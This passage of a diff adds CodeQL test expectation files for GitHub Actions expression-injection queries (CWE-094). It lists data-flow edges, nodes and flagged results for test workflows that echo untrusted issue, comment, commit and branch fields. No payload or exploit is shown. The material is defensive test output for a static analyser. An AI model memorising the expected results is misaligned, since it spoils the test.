'$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref new file mode 100644 index 00000000000..1745587e534 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected new file mode 100644 index 00000000000..13c81bd08e0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -0,0 +1,233 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ 